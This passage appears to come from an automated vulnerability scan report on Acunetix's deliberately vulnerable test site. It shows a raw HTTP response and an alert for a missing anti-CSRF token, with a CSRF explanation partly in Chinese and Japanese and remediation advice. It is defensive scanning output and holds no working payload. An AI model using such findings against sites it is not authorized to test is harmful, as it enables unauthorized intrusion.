4ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        20. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (414 bytes)
